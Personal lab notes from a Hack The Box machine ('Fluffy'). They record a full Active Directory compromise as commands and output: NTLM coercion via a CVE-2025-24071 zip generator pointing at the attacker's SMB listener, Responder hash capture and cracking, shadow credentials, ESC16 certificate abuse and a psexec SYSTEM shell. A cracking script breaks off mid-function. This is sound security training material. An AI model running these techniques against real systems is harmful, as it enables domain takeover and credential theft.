Here are my notes on the FLUFFY box from Hack The Box.
FLUFFY: 10.129.237.207 (the target IP changed between sessions; 10.129.104.173, 10.129.44.104 and 10.129.239.160 in the commands below are the same DC01)
As is common in real-life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
sudo bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -ns 10.129.237.207 -d fluffy.htb -c all
sudo bloodhound-python -u 'winrm.svc' -p 'J0elTHEM4n1990!' -ns 10.129.237.207 -d fluffy.htb -c all
BLOODHOUND DATA:
p.agila -> MemberOf -> Service Account Managers Group -> GenericAll -> Service Accounts Group:
net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.237.207"
net rpc group members "Service Accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.237.207"
p.agila:prometheusx-303
Service Accounts Group -> GenericWrite -> ldap_svc, winrm_svc and ca_svc users
python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'fluffy.htb' -u 'p.agila' -p 'prometheusx-303' #NOPE
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "winrm_svc" --action "add"
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "winrm_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: e58dd69d-78df-ae09-3a79-9e4da52a3e6f
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: d2PJiAHB.pfx
[*] Must be used with password: Zdssd2loJN16Ce5QOrM4
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
certipy cert -export -pfx d2PJiAHB.pfx -password "Zdssd2loJN16Ce5QOrM4" -out unprotected_pfx.pfx
certipy auth -pfx unprotected_pfx.pfx -username "winrm_svc" -domain "fluffy.htb"
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# certipy auth -pfx unprotected_pfx.pfx -username "winrm_svc" -domain "fluffy.htb"
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Got hash for 'winrm_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "ca_svc" --action "add"
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "ca_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a9849ddd-f03a-9f69-c807-a3d874b2fe88
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Ugq5IV6S.pfx
[*] Must be used with password: 2zcOSced1xFtRrRnPlgy
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
certipy cert -export -pfx Ugq5IV6S.pfx -password "2zcOSced1xFtRrRnPlgy" -out ca_svc.pfx
faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash  # run the Kerberos steps in a shell whose clock matches the DC: PKINIT/TGT requests fail with KRB_AP_ERR_SKEW once the skew exceeds 5 minutes
certipy auth -pfx ca_svc.pfx -username "ca_svc" -domain "fluffy.htb"
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# certipy auth -pfx ca_svc.pfx -username "ca_svc" -domain "fluffy.htb"
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Got hash for 'ca_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8
ESC16 Notes:
Update Certipy to version 5.0.0+ (ESC16 detection was added in 5.0; the v4.7.0 used elsewhere in these notes does not flag it).
Why it works: the CA lists 1.3.6.1.4.1.311.25.2 (szOID_NTDS_CA_SECURITY_EXT) under Disabled Extensions, so every certificate it issues lacks the SID security extension. A DC that is not in Full Enforcement mode (KB5014754, StrongCertificateBindingEnforcement) then maps such a certificate to an account by its UPN alone. With GenericWrite over ca_svc the chain is: set ca_svc's userPrincipalName to 'administrator', enroll in the User template as ca_svc (the cert comes back with UPN 'administrator' and no object SID, see the certipy req output below), restore the UPN, then authenticate with that cert as administrator.
certipy find -stdout -u 'ca_svc@fluffy.htb' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207
certipy find -vulnerable -stdout -u 'ca_svc@fluffy.htb' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207
[*] Enumeration output:
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally
```
Attacker (attacker@corp.local) has GenericWrite permission over a "victim" account (victim@corp.local). The victim account can enroll in any suitable client authentication template (e.g., the default "User" template) on the ESC16-vulnerable CA. The target for impersonation is administrator@corp.local.
```
certipy account \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -upn 'administrator' \
-user 'ca_svc' update
certipy account \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -user 'ca_svc' \
read
faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
certipy shadow \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -account 'ca_svc' \
auto
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# certipy shadow \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -account 'ca_svc' \
auto
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '940711bf-3814-0722-71a2-52f1db4eea54'
[*] Adding Key Credential with device ID '940711bf-3814-0722-71a2-52f1db4eea54' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '940711bf-3814-0722-71a2-52f1db4eea54' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
export KRB5CCNAME=ca_svc.ccache
certipy req \
-k -dc-ip '10.129.104.173' \
-target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' \
-template 'User'
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# certipy req -k -dc-ip '10.129.104.173' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
# Restore ca_svc's original UPN before using the cert, so that UPN 'administrator' now maps to the real Administrator account (and ca_svc is left as it was found)
certipy account \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -upn 'ca_svc@fluffy.htb' \
-user 'ca_svc' update
certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.104.173
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.104.173
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
GOT ADMINISTRATOR HASH !
administrator:8da83a3fa618b6e3a00e93f676c92a6e
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# psexec.py -hashes :8da83a3fa618b6e3a00e93f676c92a6e administrator@10.129.104.173
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.104.173.....
[*] Found writable share ADMIN$
[*] Uploading file hPrPyfgu.exe
[*] Opening SVCManager on 10.129.104.173.....
[*] Creating service qucU on 10.129.104.173.....
[*] Starting service qucU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6893]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 3DE7-5FBC
Directory of C:\Users\Administrator\Desktop
05/19/2025 03:31 PM <DIR> .
05/19/2025 03:31 PM <DIR> ..
06/03/2025 01:50 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,095,933,440 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
PAST WORK (earlier attempts, kept for reference; note that the commands below set winrm_svc's UPN to 'administrator' and never revert it, so restore it with the same `certipy account ... -upn 'winrm_svc@fluffy.htb' -user 'winrm_svc' update` form used for ca_svc above before reusing that UPN on another account, since a UPN must be unique in the forest):
certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'fluffy.htb' -upn 'administrator' -user 'ca_svc' update
certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207 -user 'winrm_svc' read
certipy req -u 'winrm_svc' -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.129.44.104 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
certipy req \
-k -dc-ip '10.129.44.104' \
-target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' \
-template 'User'
certipy account -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.44.104 -upn administrator -user winrm_svc update
certipy req -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.129.44.104 -target dc01.fluffy.htb -ca fluffy-DC01-CA -template User -upn administrator@fluffy.htb
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/FLUFFY]
└─# certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'fluffy.htb' -upn 'administrator' -user 'winrm_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'winrm_svc':
userPrincipalName : administrator
[*] Successfully updated 'winrm_svc'
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/FLUFFY]
└─# certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207 -user 'winrm_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'winrm_svc':
cn : winrm service
distinguishedName : CN=winrm service,CN=Users,DC=fluffy,DC=htb
name : winrm service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1603
sAMAccountName : winrm_svc
servicePrincipalName : WINRM/winrm.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-19T11:51:39+00:00
whenChanged : 2025-05-30T04:03:33+00:00
DON'T WORK and DON'T BOTHER ! (winrm.svc is the false-positive spelling; the real account is winrm_svc, see the GetUserSPNs output below):
python3 pywhisker.py -d "fluffy.htb" -u "winrm.svc" -p "J0elTHEM4n1990!" --target "ca_svc" --action "add"
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "winrm.svc" -p 'J0elTHEM4n1990!' --target "ca_svc" --action "add"
python3 targetedKerberoast.py -v -d 'fluffy.htb' -u 'winrm.svc' -p 'J0elTHEM4n1990!'
faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'fluffy.htb' -u 'winrm.svc' -p 'J0elTHEM4n1990!'
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-30 01:03:16Z)
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# GetUserSPNs.py -request -dc-ip 10.129.237.207 fluffy.htb/j.fleischman:J0elTHEM4n1990!
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- --------- --------------------------------------------- -------------------------- -------------------------- ----------
ADCS/ca.fluffy.htb ca_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 12:07:50.136701 2025-05-21 18:21:15.969274
LDAP/ldap.fluffy.htb ldap_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 12:17:00.599545 <never>
WINRM/winrm.fluffy.htb winrm_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-05-17 20:51:16.786913 2025-05-19 11:13:22.188468
faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
GetUserSPNs.py -request -dc-ip 10.129.237.207 fluffy.htb/j.fleischman:J0elTHEM4n1990! > kerb_hashes.txt
NOPE - none of the three TGS hashes cracked.
GetUserSPNs.py -request -dc-ip 10.129.237.207 fluffy.htb/j.fleischman:J0elTHEM4n1990! -request -save -outputfile GetUserSPNS.out
GetNPUsers.py -dc-ip 10.129.237.207 fluffy.htb/ -usersfile users.txt -format hashcat
# No AS-REP roastable users and no crackable Kerberoast hashes: don't bother.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.237.207 -x -W -D "j.fleischman@fluffy.htb" -b "dc=fluffy,dc=htb" '(objectClass=person)' > ldap-people
ldapsearch -H ldap://10.129.237.207 -x -W -D "j.fleischman@fluffy.htb" -b "dc=fluffy,dc=htb" > ldap-output.txt
# No passwords or interesting description fields in the LDAP dump.
nxc ldap 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --dns-tcp --dns-server 10.129.237.207 --bloodhound --collection All
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc ldap 10.129.237.207 -u winrm.svc -p 'J0elTHEM4n1990!'
LDAP 10.129.237.207 389 10.129.237.207 [-] Error retrieving os arch of 10.129.237.207: Could not connect: timed out
SMB 10.129.237.207 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
LDAP 10.129.237.207 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090CB2, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
LDAP 10.129.237.207 389 DC01 [+] fluffy.htb\winrm.svc:J0elTHEM4n1990!
445/tcp open microsoft-ds?
crackmapexec smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares
SMB 10.129.237.207 445 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\j.fleischamn:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
nxc smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec smb 10.129.237.207 -u users.txt -p J0elTHEM4n1990! --continue-on-success
SMB 10.129.237.207 445 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\j.coffey:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\winrm.svc:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\p.agila:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\ldap_svc:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\ca_svc:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\krbtgt:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\administrator:J0elTHEM4n1990! STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# cat users.txt
j.fleischman
j.coffey
winrm.svc
p.agila
ldap_svc
ca_svc
krbtgt
administrator
Got winrm.svc credential ! #NOPE, FALSE POSITIVE
winrm.svc:J0elTHEM4n1990!
users.txt had a typo: the real account is winrm_svc, not winrm.svc (see the GetUserSPNs output), so this [+] is a false positive.
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc smb 10.129.237.207 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB 10.129.237.207 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [*] Enumerated shares
SMB 10.129.237.207 445 DC01 Share Permissions Remark
SMB 10.129.237.207 445 DC01 ----- ----------- ------
SMB 10.129.237.207 445 DC01 ADMIN$ Remote Admin
SMB 10.129.237.207 445 DC01 C$ Default share
SMB 10.129.237.207 445 DC01 IPC$ READ Remote IPC
SMB 10.129.237.207 445 DC01 IT READ,WRITE
SMB 10.129.237.207 445 DC01 NETLOGON READ Logon server share
SMB 10.129.237.207 445 DC01 SYSVOL READ Logon server share
The crackmapexec runs above used a misspelled username (j.fleischamn), which is most likely why share enumeration returned STATUS_ACCESS_DENIED despite the [+] on the logon line (same pattern as the winrm.svc false positive below: treat a [+] that gives no share access as suspect). Retry with the correct spelling before blaming the tool; nxc is the maintained successor of crackmapexec and is what listed the shares here.
sudo lookupsid.py j.fleischman@10.129.237.207 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/…/BOXES/FLUFFY/10.129.237.207/IT]
└─# smbclient \\\\10.129.237.207\\IT -U "j.fleischman"
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 29 22:53:58 2025
.. D 0 Thu May 29 22:53:58 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1853329 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
Upgrade_Notice.pdf:
Recent Vulnerabilities
CVE ID Severity
CVE-2025-24996 Critical
CVE-2025-24071 Critical - I will think about it.
CVE-2025-46785 High - NOPE
CVE-2025-29968 High - NOPE
CVE-2025-21193 Medium - NOPE
CVE-2025-3445 Low - NOPE
CVE-2025-24071 Critical = WORKS !
https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
https://github.com/0x6rss/CVE-2025-24071_PoC
┌──(root㉿kali)-[/home/…/BOXES/FLUFFY/10.129.237.207/CVE-2025-24071_PoC]
└─# python3 poc.py
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.14.146
completed
┌──(root㉿kali)-[/home/…/BOXES/FLUFFY/10.129.237.207/CVE-2025-24071_PoC]
└─# ls
exploit.zip poc.py README.md
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (2.2 kb/s) (average 2.2 kb/s)
smb: \> dir
. D 0 Thu May 29 23:09:23 2025
.. D 0 Thu May 29 23:09:23 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
exploit.zip A 316 Thu May 29 23:09:23 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1914658 blocks available
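What the PoC run above produces, as an added example (this is not the linked 0x6rss PoC's own code and does not claim to reproduce its file byte for byte): a zip containing a .library-ms file whose search connector <url> points at the attacker's SMB listener. When Explorer processes the extracted file it resolves that UNC path and authenticates with NTLM, which is what Responder captures below. The file name "test", the share name "shared" and the listener IP 10.10.14.146 (the values typed into the PoC prompt above) are assumptions. The unc_targets function is the defender-side check for the same artefact: run it over archives uploaded to a share like IT and flag any .library-ms member that references a remote path.

```python
import io
import xml.etree.ElementTree as ET
import zipfile
from xml.sax.saxutils import escape

LIB_NS = "http://schemas.microsoft.com/windows/2009/library"


def library_ms(unc_path: str) -> str:
    """Windows Library Description whose search connector points at a UNC path.
    Explorer resolves that location when it handles the file, which is the NTLM
    coercion behind CVE-2025-24071."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<libraryDescription xmlns="{LIB_NS}">\n'
        "  <searchConnectorDescriptionList>\n"
        "    <searchConnectorDescription>\n"
        "      <simpleLocation>\n"
        f"        <url>{escape(unc_path)}</url>\n"
        "      </simpleLocation>\n"
        "    </searchConnectorDescription>\n"
        "  </searchConnectorDescriptionList>\n"
        "</libraryDescription>\n"
    )


def build_zip(name: str, listener_ip: str, share: str = "shared") -> bytes:
    """Zip with <name>.library-ms aimed at \\\\listener_ip\\share (names are assumptions)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{name}.library-ms", library_ms(f"\\\\{listener_ip}\\{share}"))
    return buf.getvalue()


def unc_targets(zip_bytes: bytes) -> dict:
    """Defender-side check: every .library-ms member of an archive together with the
    remote (\\\\host\\share) paths its <url> elements reference. Empty dict = nothing to flag."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for member in zf.namelist():
            if not member.lower().endswith(".library-ms"):
                continue
            root = ET.fromstring(zf.read(member))
            urls = [u.text or "" for u in root.iter(f"{{{LIB_NS}}}url")]
            remote = [u for u in urls if u.startswith("\\\\")]
            if remote:
                hits[member] = remote
    return hits


if __name__ == "__main__":
    payload = build_zip("test", "10.10.14.146")
    print(len(payload), "bytes;", unc_targets(payload))
```

Because the coercion fires from Explorer's handling of the file rather than from the user opening it, the patch for CVE-2025-24071 and blocking outbound SMB (445/tcp) from workstations are the controls that matter; content filtering with a check like unc_targets is a backstop, not a replacement.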
Responder:
[SMB] NTLMv2-SSP Client : 10.129.237.207
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:6d9184522b8a6eb5:90C72BE4FC9307C2E20FA9EFA56E3A19:010100000000000000A146F2B3D0DB01067631E67D603D080000000002000800560046004C004D0001001E00570049004E002D004300550050004B0056004E0033004400310050005A0004003400570049004E002D004300550050004B0056004E0033004400310050005A002E00560046004C004D002E004C004F00430041004C0003001400560046004C004D002E004C004F00430041004C0005001400560046004C004D002E004C004F00430041004C000700080000A146F2B3D0DB010600040002000000080030003000000000000000010000000020000059BB148E3C6418A32E79B118D34F764613C1D0D394F94C40FAC674B7042E1BD40A001000000000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340036000000000000000000
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt p.agila_hashes
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
1g 0:00:00:05 DONE (2025-05-29 16:12) 0.1808g/s 816977p/s 816977c/s 816977C/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
p.agila:prometheusx-303
p.agila credential discovered !
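What john is doing in the run above, as an added example (not the page's own code): a NetNTLMv2 "hash" is not a hash of the password but the NTProofStr the client computed over the server challenge and its own blob, so cracking means recomputing HMAC-MD5(NTOWFv2(candidate), challenge + blob) for every candidate and comparing. The block builds a Responder-style capture line for FLUFFY\p.agila from a constructed server challenge, client nonce and AV pairs (only the timestamp is taken from the page's blob; the real capture is not reproduced because the blob must match byte for byte), recovers the password from a tiny wordlist, and decodes the AV pairs so you can see what the captured blob tells you about the client. MD4 is implemented inline because hashlib's md4 is missing on OpenSSL 3 builds.

```python
import hmac
import os
import struct
from hashlib import md5


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is absent on OpenSSL 3 builds)."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
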